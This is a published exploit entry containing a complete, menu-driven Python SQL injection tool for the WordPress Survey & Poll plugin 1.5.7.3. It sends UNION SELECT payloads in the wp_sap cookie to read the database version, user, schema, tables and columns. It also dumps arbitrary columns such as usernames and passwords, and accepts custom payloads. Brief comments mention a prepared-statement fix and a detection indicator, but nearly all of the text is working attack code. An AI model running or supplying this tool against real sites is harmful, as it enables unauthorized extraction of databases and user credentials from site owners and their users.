Authored by Mohin Paramasivam

WordPress Survey and Poll plugin version 1.5.7.3 suffers from a remote SQL injection vulnerability.

# Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)
# Date: 2021-09-07
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: MariaDB, MySQL

#!/usr/bin/python3

import requests
import re
import warnings
from bs4 import BeautifulSoup, CData
import sys
import argparse
import os
import time
from termcolor import colored
import validators

#Install all the requirements

"""
pip3 install requests
pip3 install bs4
pip3 install argparse
pip3 install termcolor
pip3 install validators

"""


# ---- Command-line handling ----
# The only input is the URL of the page that embeds the Survey & Poll widget;
# every request the script makes goes to that single URL.
parser = argparse.ArgumentParser(description='WP Plugin Survey & Poll V1.5.7.3 SQL Injection (sss_params)')
parser.add_argument('-u', help='Poll & Survey page URL')
args = parser.parse_args()

url = args.u


# Exactly "<script> -u <url>" is accepted; any other argument count prints usage and leaves.
if len(sys.argv) != 3:
    parser.print_help(sys.stderr)
    sys.exit()

# validators.url() rejects bare hostnames, so the scheme must be spelled out by the caller.
if not validators.url(url):
    print(colored("rnEnter URL with http:// or https://rn", 'red'))
    parser.print_help(sys.stderr)
    sys.exit()


def currect_db_name():
    """Menu option 2: ask the backend for database() through the UNION's tenth column.

    The name keeps the original misspelling on purpose — main() dispatches on it.
    """
    inject("""["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]""")


def db_version():
    """Menu option 1: read @@version through the UNION's tenth column."""
    inject("""["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]""")


def hostname():
    """Menu option 3: read @@hostname through the UNION's tenth column."""
    inject("""["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@hostname,11#"]""")


def current_user():
    """Menu option 4: read user() through the UNION's tenth column."""
    inject("""["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,user(),11#"]""")


def list_databases():
    """Menu option 5: concatenate information_schema.schemata names into the tenth column."""
    inject("""["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11 from information_schema.schemata#"]""")

def list_tables_db():
    """Menu option 6: prompt for a schema name and list its tables via information_schema.tables.

    The prompt value is spliced into the payload verbatim (no quoting), exactly as the
    original %-formatting did.
    """
    db = input("rnDatabase : ")
    inject(f"""["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema='{db}'#"]""")


def list_columns_db():
    """Menu option 7: prompt for schema and table, list the table's columns via information_schema.columns.

    Both prompt values are spliced into the payload verbatim, matching the original formatting.
    """
    db = input("rnDatabase : ")
    table = input("Table : ")
    inject(f"""["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11 from information_schema.columns where table_schema='{db}' and table_name='{table}'#"]""")


def dump_db():
    """Menu option 8: prompt for schema, table and a column list, then group_concat those columns.

    The three prompt values are spliced into the payload verbatim; the original also
    built an unused "db.table" string, which is dropped here because nothing read it.
    """
    db = input("rnDatabase: ")
    table = input("Table: ")
    column = input("Columns Eg: users,password : ")
    inject(f"""["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat({column}),11 from {db}.{table}#"]""")


def custom_payload():
    """Menu option 9: send whatever the operator types as the raw cookie value."""
    inject(input("rnPayload : "))

def inject(inject_payload):
    """Send one payload in the `wp_sap` cookie, print the reflected field, then re-enter main().

    This is the vulnerable request. The cookie carries a JSON-style list whose first
    element looks like a numeric poll id (TODO confirm against the plugin source), and
    the plugin evidently places that value into a SQL statement without parameterisation:
    every payload in this file closes the `'))` context and appends an eleven-column UNION,
    whose tenth column is what the script reads back. The plugin-side fix is a prepared
    statement ($wpdb->prepare) plus rejecting any cookie that is not the expected integer;
    on the monitoring side a `wp_sap` cookie containing `UNION ALL SELECT` or
    `information_schema` is an unambiguous indicator to alert on.

    Output extraction: the response is searched for a text node containing "CDATA", the
    node is split on ':' and field 11 is printed — presumably where the tenth UNION
    column lands in this plugin's inline script (inferred from the payload layout, not
    verified here). soup.find() returns None when no such node exists, so a target that
    does not reflect the data raises AttributeError at the split() call.

    Args:
        inject_payload: the raw cookie value, already assembled by the caller.
    """
    session = requests.Session()
    cookie_jar = {'wp_sap': inject_payload}

    print(f"rn{colored('Sending Payload :', 'red')} {colored(inject_payload, 'green')}rn")
    response = session.get(url, cookies=cookie_jar)

    # bs4 emits a UserWarning when the markup resembles a URL/filename; silence it before parsing.
    warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
    soup = BeautifulSoup(response.text, features="lxml")
    cdata = soup.find(text=re.compile("CDATA"))

    fields = cdata.split(':')
    output = fields[11]
    print(f"rn{colored('SQLI OUTPUT :', 'red')} {colored(output, 'green')}rn")

    # Brief pause before the menu is shown again (main() is re-entered recursively).
    time.sleep(1)
    main()



def main():
    """Print the interactive menu, read a choice and dispatch to the matching payload function.

    Control flow matches the original: the "10" choice exits; every other choice — valid
    or not — ends by calling main() again (handlers themselves re-enter main() from inject()).
    """
    banner = (
        "Automated SQL Injector (wp-survey-and-poll)",
        "Enter the respective number to select option",
        "#EXAMPLE Option : 1rn",
        "Option 1 : Grab Database Version",
        "Option 2 : Get Current Database Name",
        "Option 3 : Get Hostname ",
        "Option 4 : Get Current User",
        "Option 5 : List All Databases",
        "Option 6 : List Tables From Database",
        "Option 7 : List Columns from Tables",
        "Option 8 : Dump Database",
        "Option 9 : Custom Payload",
        "Option 10 : Exit",
        "rn",
    )
    for line in banner:
        print(line)

    option_selected = str(input("Select Option : "))

    # Menu number -> payload function; looked up at call time like the original's if-chain.
    handlers = {
        "1": db_version,
        "2": currect_db_name,
        "3": hostname,
        "4": current_user,
        "5": list_databases,
        "6": list_tables_db,
        "7": list_columns_db,
        "8": dump_db,
        "9": custom_payload,
    }
    handler = handlers.get(option_selected)
    if handler is not None:
        handler()

    # Only the "10" branch terminates; anything else falls through to a fresh menu.
    if option_selected == "10":
        sys.exit()
    main()

# Entry point. Runs unconditionally on import as in the original; the menu recurses
# (inject() calls main()) until option 10 calls sys.exit() or the user interrupts.
main()